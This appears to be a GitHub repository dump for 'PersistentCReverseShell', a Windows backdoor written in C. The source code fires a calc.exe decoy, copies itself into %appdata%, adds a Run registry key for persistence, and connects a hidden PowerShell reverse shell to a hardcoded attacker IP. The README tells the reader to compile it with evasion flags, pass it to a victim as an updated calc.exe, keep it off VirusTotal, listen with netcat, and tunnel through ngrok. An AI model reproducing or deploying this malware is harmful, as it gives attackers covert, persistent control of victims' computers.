├── reverse.exe ├── creverse.c └── README.md /reverse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1captainnemo1/PersistentCReverseShell/HEAD/reverse.exe -------------------------------------------------------------------------------- /creverse.c: -------------------------------------------------------------------------------- 1 | // AUTHOR : #Captain_Nemo 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #pragma comment(lib, "Ws2_32.lib") 9 | #define DEF_BUFF 2048 10 | 11 | void rsh(char* server, int Port) 12 | { 13 | while(1) 14 | { 15 | 16 | 17 | WSADATA wsaData; 18 | SOCKET Winsock; 19 | struct sockaddr_in address; 20 | char Rec_dat[DEF_BUFF]; 21 | STARTUPINFO process_startup; 22 | PROCESS_INFORMATION p_info; 23 | 24 | WSAStartup(MAKEWORD(2,2), &wsaData); 25 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 26 | 27 | 28 | address.sin_family = AF_INET; 29 | address.sin_port = htons(Port); 30 | address.sin_addr.s_addr =inet_addr(server); 31 | 32 | WSAConnect(Winsock,(SOCKADDR*)&address, sizeof(address),NULL,NULL,NULL,NULL); 33 | if (WSAGetLastError() == 0) 34 | { 35 | 36 | memset(&process_startup, 0, sizeof(process_startup)); 37 | char proc[] = "powershell.exe -WindowStyle Hidden"; 38 | process_startup.cb=sizeof(process_startup); 39 | process_startup.dwFlags=STARTF_USESTDHANDLES; 40 | process_startup.hStdInput = process_startup.hStdOutput = process_startup.hStdError = (HANDLE)Winsock; 41 | CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &process_startup, &p_info); 42 | // WaitForSingleObject(p_info.hProcess, INFINITE); 43 | // CloseHandle(p_info.hProcess); 44 | // CloseHandle(p_info.hThread); 45 | //memset(Rec_dat, 0, sizeof(Rec_dat)); 46 | //int Rec_code = recv(Winsock, Rec_dat, DEF_BUFF, 0); 47 | // if (Rec_code <= 0) 48 | // { 49 | // closesocket(Winsock); 50 | // WSACleanup(); 51 | // continue; 52 | // } // end if 53 | // if (strcmp(Rec_dat, "exit\n") == 0) 54 | //{ 55 | exit(0); 56 | } // end if 57 | exit(0); 58 | } // end while 59 | } // end function rsh 60 | int main() 61 | { 62 | char h[] = "192.168.225.197"; 63 | int p = 8080; 64 | system("start C:\\WINDOWS\\System32\\calc.exe"); // fire decoy 65 | system("cmd /c copy .\\reverse.exe %appdata%"); // copy malware to appdata 66 | system("cmd /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"Secure\" /t REG_SZ /F /D \"%appdata%\\reverse.exe"); //add registry persistence 67 | rsh(h, p); // call rsh function 68 | return 0; 69 | } // end main 70 | 71 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PersistentCReverseShell 2 | 3 | A FUD Backdoor Reverse Shell coded in C for any Windows distribution, that will fire a decoy app in the foreground while connecting back to the attacker machine as a silent background process. 4 | 5 | 6 | In additition to this , the malware will copy itself in the %appdata% folder , and make itself persistent ON BOOT , by adding a startup registry key in :HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 7 | 8 | Thus at every boot, the malware will start a callback to the attacker machine, and will connect, provided the Listner, is on. 9 | 10 | 11 | 12 | Oh, did I mention , that the shell that YOU WILL GET WILL BE A "POWRSHELL" !!!! 13 | 14 | 15 | Change the IP to the attacker machine's IP and the port number to your desired port number and compile using: 16 | 17 | i686-w64-mingw32-gcc creverse.c -o reverse.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc 18 | 19 | 20 | Pass it to the attacker , stating that this is a updated version of calc.exe. You can scan the application with your AV solutions , if you want , and I am pretty sure thant 98% of the AV solutions will NOT detect it. It has passed the check of Windows Defender with an updated definition file. 21 | 22 | PLEASE DO NOT UPLOAD TO VIRUSTOTAL !!! 23 | 24 | Start a netcat listener on port 8080 using nc -lvp 8080 25 | 26 | Once the victim executes the app, the decoy process (calc.exe) will fire up in the foregroud on the victim's end , while a reverse shell will fire up in the background, giving you a POWERSHELL PROMPT on the attacking machine. 27 | 28 | PS: Even if the victim decides to exit the calc.exe the reverse shell session will be on , as they are running on 2 different processes. 29 | 30 | Cheers 31 | 32 | #Captain_Nemo 33 | 34 | PS: For WAN exploits , fire up ngrok with the following parameters (incase port forwarding is dissalowed by your ISP) ./ngrok tcp 8080 35 | 36 | Region United States (us) 37 | Web Interface http://127.0.0.1:4040 38 | Forwarding tcp://0.tcp.ngrok.io:19864 -> localhost:8080 39 | 40 | Connections ttl opn rt1 rt5 p50 p90 41 | 0 0 0.00 0.00 0.00 0.00 42 | 43 | Ping 0.tcp.ngrok.io atleast 6-7 times to get a stable mirror IP and port. When u see that the IP and the port numbers are same after 5-6 last pings , use that IP and port in the code.> compile the code > pass it to the victim machine > make sure ngrok is NOT interrupted on the attacker machine as a new ngrok session will grab a new IP and port > start a nc -lvp 8080 on the attacker system. > execute the payload on the victim machine > get session over WAN/Internet on the attacker machine . 44 | 45 | 46 | CHEERS 47 | 48 | #CAPTAIN_NEMO 49 | https://youtu.be/nfK-3sYD4uE 50 | --------------------------------------------------------------------------------